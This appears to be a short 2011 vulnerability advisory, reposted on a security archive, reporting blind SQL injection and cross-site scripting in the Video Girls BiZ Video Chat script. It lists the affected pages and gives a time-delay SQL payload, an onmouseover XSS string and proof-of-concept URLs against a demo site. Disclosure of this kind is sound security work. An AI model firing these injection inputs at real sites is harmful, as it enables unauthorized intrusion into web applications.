Video Girls BiZ Video Chat script suffers from cross site scripting and remote SQL injection vulnerabilities.
f08affdc5afc926fe3dc84284f7bab1c69b9a826f7b4c5b18d73b619062ce184# Exploit Title: Video Girls BiZ Video Chat Script - Blind SQL Injection and XSS Vulnerability
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr
ISSUE
Blind SQL Injection and XSS can be done using.
Vulnerable Page:
forum.php (Blind SQL Injection)
register.php (XSS)
submit.php (XSS)
videoflashchat.php (XSS)
forgot.php (XSS)
picrute.php (XSS)
Example:
2 and sleep(2) (For Blind Sql Injection)
'onmouseover=prompt(957589)> (For XSS)
POC:
http://www.videogirls.biz/demo/videoflashchat.php/%22onmouseover=prompt%28940499%29%3E
http://www.videogirls.biz/demo/forum.php?ftid=2%20and%20sleep%282%29%20&t=Test-Forum-Category-2-test-topic-announcement
Thanks,
Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed